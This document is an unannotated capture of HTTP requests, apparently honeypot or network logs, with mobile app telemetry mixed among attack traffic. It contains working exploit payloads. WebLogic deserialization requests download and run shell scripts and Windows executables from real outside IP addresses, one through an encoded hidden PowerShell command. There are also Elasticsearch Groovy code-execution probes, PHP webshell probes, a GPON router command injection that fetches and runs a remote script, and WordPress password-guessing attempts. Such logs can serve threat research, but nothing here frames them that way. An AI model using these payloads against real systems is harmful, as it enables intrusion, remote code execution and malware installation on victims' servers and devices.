User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 355
n=7694298728859&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyNC4yNDEuMTEcGAAYABgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZHBgSMTExLjIwNi4yMDAuMjo1MjIyFQAVAhZ%2BFQAbAAAAGA9jb20ueGlhb21pLnhtc2YYD2NvbS54aWFvbWkueG1zZhgWNC40LjQtVjcuMC41LjAuS1hETUlDSQAA&t=1494755725494&s=8D24A982DD5CAC25E98D0FFA078F22D4
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
SvYPk9/MZYbk6RyObrrkoTkxI9AdQjXRedpDpXY1sin5YHFSzzzD1sUXDT9OCY8A5/v3hnUSFImbMJPc62WpFoYam0TnRz68qZa3mCPikqIqDUUFw7zxnVJJvCI0HX6EvW8IMxbsInPU4CcPgFrTRh3RUS0h9jedD3zH1MytwLI4P5l9kkHZN7XEYnCShqlWCFRqAWGU8XcyQJVnTxqmIZvxe1Q5LtU8oaam96ASEukGA9bXq3D1BvupBEjQltSV7ov/tZaKj71D1qBth20Oz/dExDRLAmxAe/ObfTtY+LdSKknlsUS2SrB861ijZEkLVDpldnWHhgNoNPz7M31UIyCxvDzm6sLltPyGsvU6khyOh/t+Uhbg43d62OWrTARB3Ron5b6tZ9QxxXQBWbeLjr2aq9G/ry/4tiw7uJZGJ3CdGbs=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
Ul23znRAAnXWh0DzLMG93QqBGSrlaKh9j+QiUwSO1U9lI65BSwLRLnS27uX4PCp8g9uUqNPYMGUmSEJxx/1f27wzkNvLznsZJr3br/NMMfgHwof37O9YWeVi4FYc4s1HSFg2pxY/HlFmFQJq+DA9nmnW0gNEfldUPwO2/6vLLHkgZvweb2Qdpqgvq7ffsA2X6DXx3n/XePzFKkED/vFgDOr5O3hLphMR8z84+Oo0Y3CQ2Ayok+VzXEcSs+tFGyosbzQLNNWngZPOEpB0flv2U8+nWTgNGjz85pFp338MI6CsTSwbI5amPtWcHPkIdXha0qeLdVkqiGf4cQ9tDWgAIwqiElDturm9LPiqOAEpuhC+WdUK+1XRNlNtdKNUnBffvXzahhTNXDKtPVyGrUN8w3mhF40SHD7muZBsqd6g
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60
A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1078
Content-Type: multipart/form-data; boundary=GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
61754
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
63a3f4d7d18da1ff2cfd38e684e2477f
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
435844
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
17e645353e4d8367cde87490f750d400
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--K-MuLqMv3SPEVC7sTTH1dpuucVF4t4hOGRC3Tqs1--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://appinfocdn.ksmobile.net/cpui HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 58
:‘áå∆—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIetH_lq.°Î¡ÿn=ªgÌ∫NU]&
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
SqNYk4maYCxsDjnLiiWXJy+zzjldGfHrrWVT90FsngCw3LYKpKsYw9in9u1QJ9OROu0cFnaeVmHy4SZXMQ549PEbVEGritHlagLJ5iQINyy3+210fcm5VA/vnebZ3BI3eji4pl5wTBifyTl9tywxsj+Q82v1DiTIuwtomlw16xRHIvAVcFVj7U+tvVM8yqTPAWbFISGF8A3B6aDTzSv6R+Af+XV8lp30n5EbZ2M1iXul2itXXrX0rLtHJuKqnQs0mED6jpcwrfZHdSZStHgwSqYbrtqqMZwbot2kMdBZgIzPZxf0w3pdfXeck7YiMF4/bE2SgV4IJmxDh7IvesmrOlzNehKaNGSiQlwmnFHy4XdP5JMJI7+Qsg==
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477785375459
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 37
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchueasd123
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 142
{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"help\").getText()"}}}
POST http://puds.ucweb.com/upgrade/index.xhtml?dataver=pb HTTP/1.1
Content-Length: 525
Host: puds.ucweb.com
Connection: Keep-Alive
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=123123
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://check.best-proxies.ru/azenv.php?auth=146341031383456&a=PC&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
UVm6yHcUBZbg6tA61kGfR/oPD24GnyeYjXAjFwLwPDzhiJOrTEaiAV0FG/CkseabqHpQv0nm8jvEuMDIH65Jf4WO1W9YMOYVfrlZMcr9+ebAOqVUYfW8rDcMhbJS8EEEmGh5GIdzfqiYAtlw6aoL7xzY+7CMdiXrl0dp7QWjHfgyALncyoM8el+zKxh4DPBgJUHFpYlrnEoxLglYrOGo9hqzJdsRQgYZlLctKAuTXpjFfwfN5X1haQjWdybtl5e1LhqiJtAWkNQDaILxxE4Up51x+I50BY+BWSGGVtQnbKKKt3qMKWj2D8aNl76JrnjvAX565XWCNGJNp1BN9G7U7AwmZqLXR2nurcVharCrEz19LgCm6x0JTUO6I75sg7Qg/XdCenzc3hNIKu4=
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=letmein
POST http://behacdn.ksmobile.net/erfl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 49
1U˚asÍÕ`i'c
KlE^Sz]#[@^zZr^kZ&=0OoBcékJn‚O
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache
FKVWyI/BN6p6NsEoAO2Wcu75v77xN8FBz5t+l7nRGg7KeZLoZKutD+OmT7ctYKAmB3aGUWrc/5uJhnwYiQNL0Ow8NwhF+qvc1V3hnYK7JNiChwzoryGPfSk37AIaFJyHj8BiQtc2Zvz68A9H6o76CVlYR+Q01Vu1v75Dm0wd+zeRaA5oqSK60aKX0qyQ50zWuSjsnbC1uumVvP7Qolwxg1a1+3RdBGYNL4qaMZNvClmLmlGM8Tll+IYiu6cZGyLo8yfMX1olj6Rp8DV/LidsYQOnW5h5NKFBgXnn+X0uITv8HCe56daolennqYPQm902c4LyDccVaK83MfMklDdDEluo2iho1YBsetlP5BTomGuMsjjUzOA7qH3sYvfxOLawKKOeSkXepZk=
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495194021822&chk=d8c0a2f4 HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
1ee
0
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
